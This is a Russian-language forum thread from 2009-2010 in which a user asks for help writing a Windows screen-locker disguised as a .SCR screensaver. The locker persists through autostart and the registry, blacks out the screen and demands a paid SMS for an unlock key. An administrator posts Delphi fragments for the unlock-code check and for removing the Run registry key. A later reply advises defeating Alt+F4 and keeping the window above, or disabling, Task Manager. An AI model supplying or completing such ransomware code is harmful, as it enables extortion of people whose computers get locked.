Дата: Воскресенье, 15.03.2009, 15:08 | Сообщение # 1
Есть такой файл, с расширением *.SCR - типа заставка, я читал что это скорее всего Delphi, поэтому прошу помощи тут!
Вот что я хочу: =) При запуске программа автоматически копируется в автозапуск и в реестр прописывается. При её запуске появляется чёрный экран, и сообщение типа "Ваш копм заблокирован, чтобы разблокировать его введите ключ, чтобы получить ключ отправьте СМС ... на номер ..."
вот пример, нужны его исходники чтоб текст редактировать: http://depositfiles.com/files/cv965r6pp
Дата: Воскресенье, 15.03.2009, 15:20 | Сообщение # 2
Администратор
Статус: Offline
Проще простого, если хоть немного шаришь в Delphi можно за 15 минут написать, щас скину заготовку Система: Windows 10 x64, Kali Linux Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель Я не вредитель, я всего лишь теоретик
procedure DelKey; var Reg:Tregistry; begin Reg:=TRegistry.Create; Reg.RootKey:=HKEY_LOCAL_MACHINE; Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',true); Reg.DeleteValue(Application.Title); Reg.Free; end;
procedure TForm1.Button1Click(Sender: TObject); begin if Edit1.Text= 'AAAA-AAAA-AAAA-AAAA' Then begin DelKey; Label1.Caption:= 'Верный код'; Button1.Visible:=False; Button2.Visible:=True; end else Label1.Caption:= 'Код не верный!'; end;
procedure TForm1.Button2Click(Sender: TObject); begin Close; end;
Дата: Понедельник, 25.01.2010, 16:47 | Сообщение # 7
pavl1k,
Quote (pavl1k)
спасибо, но она закрывается нажатием Alt+F4))) мне уже помогли ну всё равно тебе тож спасибо! =)
Alt+F4, фигня, нада еще добавить процедуру защиты от диспетчера задач. поверх окна диспетчера я выбирался с помощью таймера, который постоянно обновлял код: {поверх всей хрени}. Или диспетчер надо отключать, как то...